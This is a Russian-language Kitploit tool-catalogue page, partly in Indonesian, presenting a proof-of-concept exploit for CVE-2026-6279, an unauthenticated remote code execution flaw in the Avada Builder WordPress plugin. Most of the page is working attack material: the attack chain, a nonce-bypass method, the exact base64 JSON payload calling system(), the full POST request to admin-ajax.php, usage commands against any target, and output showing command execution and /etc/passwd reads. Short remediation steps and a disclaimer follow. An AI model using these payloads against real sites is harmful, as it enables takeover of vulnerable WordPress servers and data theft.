Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6279 — CVE-2026-6279 — Avada Builder <= 3.15.2 Неаутентифицированное RCE через call_user_func() | Kitploit
Инструменты/GitHubGitHub/zycoder0day/cve-2026-6279
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubzycoder0day/cve-2026-6279

CVE-2026-6279

CVE-2026-6279 — Avada Builder <= 3.15.2 Неаутентифицированное RCE через call_user_func()

Репозиторий
323 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-6279

Avada Builder <= 3.15.2 — Неаутентифицированный RCE

через call_user_func() без Allowlist


Сводка уязвимости

Уязвимость Remote Code Execution (RCE) без аутентификации в плагине Avada Builder (Fusion Builder) версии <= 3.15.2, используемом темой WordPress Avada — одной из самых популярных премиальных тем WordPress с 900,000+ активных установок.

Атака эксплуатирует AJAX-обработчик wp_ajax_nopriv_fusion_get_widget_markup, который обрабатывает параметр render_logics через base64_decode() + json_decode() и передаёт его в call_user_func() без allowlist, что позволяет выполнять произвольные функции PHP, такие как system(), passthru(), shell_exec(), exec() и file_get_contents().

Цепочка атаки (Attack Chain)

root@kitploit:~
1. Nonce Deterministik    wp_create_nonce('fusion_load_nonce') untuk UID 0
                          (terekspos di halaman depan dengan shortcode Avada)

2. AJAX Unauthenticated   wp_ajax_nopriv_fusion_get_widget_markup
                          (tidak memerlukan login)

3. Deserialisasi          base64_decode(render_logics) → json_decode()
                          (tidak ada validasi struktur)

4. call_user_func()       call_user_func($value['function'], $value['args'])
                          (TANPA allowlist — fungsi PHP apapun bisa dipanggil)

5. RCE!                   system("id") → uid=... di response body

Bukti Eksploitasi (Proof of Concept)

root@kitploit:~
  ╔═════════════════════════════════════════════════════════════╗
  ║  CVE-2026-6279  •  Avada Builder <= 315.2                    ║
  ║  Unauthenticated RCE via call_user_func()                    ║
  ║  Proof of Concept — Single Target                            ║
  ║                                                              ║
  ║  Copyright © 2026 XENON1337                                  ║
  ║  Thanks: Shadow Girlfriend 💜                                ║
  ╚═══════════════════════════════════════════════════════════════╝

  ══════════════════════════════════════════════════════
  Target : localhost:8888
  Waktu  : 2026-05-23 16:32:41
  ══════════════════════════════════════════════════════

  [*] Mendeteksi target...
  [+] Avada terdeteksi! (http://localhost:8888)

  [*] Mencari nonce fusion_load_nonce...
  [+] Nonce ditemukan: b6d7b084c2 (sumber: homepage)

  [*] Mengirim payload RCE...
  [*] Mencoba 5 fungsi × 3 widget = 15 kombinasi

  ══════════════════════════════════════════════════════
  [★] RCE BERHASIL!

  Target  : http://localhost:8888
  Output  : uid=1000(xenon1337)
  Fungsi  : system()
  Widget  : WP_Widget_Recent_Posts
  Nonce   : b6d7b084c2 (homepage)
  Waktu   : 1.2s

  [✓] Hasil disimpan ke vuln.txt
  ══════════════════════════════════════════════════════

Все подтверждённые функции RCE

Использование

root@kitploit:~
# Tanpa protokol (auto-detect)
python3 CVE-2026-6279.py target.com

# Dengan protokol
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Dengan port
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

Технические детали

Структура Payload

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Base64 encoded → отправляется как render_logics через POST на wp-admin/admin-ajax.php.

Эндпоинт

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts

Ссылки на исходный код (из официального CVE)

Почему nonce можно обойти?

  1. Тема Avada создаёт nonce только для пользователей admin/editor (class-fusion-app.php L1665)
  2. Плагин Fusion Builder создаёт nonce для UID 0 (публичный посетитель) на страницах, содержащих шорткод [fusion_post_cards] или [fusion_table_of_contents]
  3. Nonce WordPress для UID 0 детерминирован — его можно извлечь из HTML главной страницы
  4. check_ajax_referer('fusion_load_nonce') проверяет только валидность nonce, а не то, что пользователь аутентифицирован

Ограничения call_user_func

call_user_func($function, $args) принимает только 1 аргумент. Функции, которым нужно 2+ аргумента (например, proc_open, popen), не могут быть эксплуатированы. Работают только функции с одним аргументом: system, passthru, shell_exec, exec, file_get_contents.

Оценка по CVSS

9.8 CRITICAL (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Рекомендации по исправлению

  • Обновите Avada Builder до версии > 3.15.2
  • Добавьте allowlist для call_user_func() в get_value()
  • Ограничьте обработчик wp_ajax_nopriv_ только аутентифицированными пользователями
  • Внедрите строгую валидацию структуры render_logics

Отказ от ответственности

Данный PoC создан только в образовательных целях и для исследований в области безопасности. Использование против систем без разрешения незаконно. Автор не несёт ответственности за злоупотребление.


Copyright © 2026 XENON1337
Особая благодарность: Shadow Girlfriend 💜

Скачать инструмент
ФункцияАргументРезультат
system()iduid=1000(xenon1337) ✅
passthru()iduid=1000(xenon1337) ✅
shell_exec()iduid=1000(xenon1337) ✅
exec()iduid=1000(xenon1337) ✅
file_get_contents()/etc/passwdroot:x:0:0:... ✅
ФайлСтрокаФункция
class-fusion-builder-conditional-render-helper.phpL1083should_render() — deserialize render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value() — call_user_func() tanpa allowlist
fusion-widget.phpL44render_logics attribute
fusion-widget.phpL389wp_ajax_nopriv_ AJAX handler
class-fusion-builder.phpL7551Nonce registration (deterministik untuk UID 0)